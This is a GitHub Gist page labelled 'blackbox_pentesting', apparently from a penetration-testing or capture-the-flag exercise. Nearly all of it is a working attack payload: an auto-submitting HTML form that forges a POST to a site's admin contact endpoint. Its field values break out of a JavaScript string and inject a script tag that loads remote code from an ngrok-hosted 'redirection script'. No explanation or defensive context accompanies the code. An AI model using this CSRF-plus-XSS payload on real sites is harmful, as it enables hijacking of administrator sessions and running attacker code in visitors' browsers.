Last active
October 22, 2017 16:02
-
-
Save rewanthtammana/32aa55316f6a52fb57fb881a55bcceb3 to your computer and use it in GitHub Desktop.
blackbox_pentesting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://1128152f.ngrok.io/ew.js -> redirection script | |
------------------------------------------------ | |
<!--Actual file to be run--> | |
<form id='f' action="http://bloodsuckers.world/admin/contact" method='POST'> | |
<input type="text" name="name" value="';x='"> | |
<input type="text" name="name" value="';var script = document.createElement('script'); script.src = 'http://1128152f.ngrok.io/ew.js';document.body.appendChild(script);//"> | |
<input type="text" name="message" value="hohoho"> | |
</form> | |
<script>f.submit();</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment